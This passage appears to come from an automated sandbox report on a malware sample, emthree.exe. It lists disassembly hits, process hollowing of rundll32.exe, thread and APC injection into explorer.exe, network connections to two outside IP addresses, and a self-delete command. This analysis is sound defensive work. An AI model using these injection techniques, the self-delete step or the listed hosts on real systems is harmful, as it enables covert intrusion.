          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F53D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\emthree.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 23.27.109.19 80
          Source: C:\Windows\explorer.exe Network Connect: 184.154.50.243 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\emthree.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\emthree.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\emthree.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\emthree.exe Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\emthree.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\emthree.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: AC0000
          Source: C:\Users\user\Desktop\emthree.exe Process created: C:\Users\user\Desktop\emthree.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: explorer.exe, 00000002.00000002.503348798.0000000005EA0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.488072734.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Users\user\Desktop\emthree.exe VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
